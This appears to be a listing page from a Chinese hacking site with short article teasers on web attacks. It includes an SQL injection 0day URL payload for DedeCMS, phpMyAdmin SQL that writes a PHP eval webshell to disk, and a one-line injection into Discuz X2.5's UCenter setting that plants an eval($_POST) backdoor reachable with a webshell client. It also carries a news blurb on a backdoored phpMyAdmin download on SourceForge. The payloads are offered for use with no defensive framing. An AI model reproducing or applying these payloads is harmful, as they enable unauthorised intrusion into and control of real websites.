DedeCMS会员中心分类管理SQL注射0day

漏洞描述: 需要magic_quotes_gpc = Off,所以说是鸡肋啊. 发生在数组key里的注射漏洞,有点意思. 这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 https://www.webshell.cc/member/mtypes.php?dopost=save exploit: mtypename[7' and (@`'` or (56%3D56/*sql inje...

- 阅读全文 -

phpmyadmin 导出 shell 至中文路径

set character_set_client='gbk'; set character_set_connection='gbk'; set character_set_database='gbk'; set character_set_results='gbk'; set character_set_server='gbk'; select '<?php eval($_POST[cmd]...

- 阅读全文 -

SourceForge被黑客入侵 phpMyadmin被植入后门

2012年9月25日消息,今天微博爆出消息,国外知名下载网站SourceForge韩国CDN节点疑似被入侵,热门下载资源phpMyadmin被植入后门。 SourceForge. net是世界上最大的开源软件开发网站。很多国外非常有用的资源都可以从上面下载。而由于国内目前暂无SourceForge的CDN节点,导致从国内访问下载均是从韩国节点获取数据。对国内用户影响非常大。 国内用户从韩国节点下载...

- 阅读全文 -

discuz X2.5后台拿shell及修复

有管理员帐号及密码。  直接在UCenter IP 地址:里面插入一句话 xxoo\');eval($_POST[a])?>;//  就ok 然后菜刀连接https://www.webshell.cc/config/config_ucenter.php密码a , 测试通过

- 阅读全文 -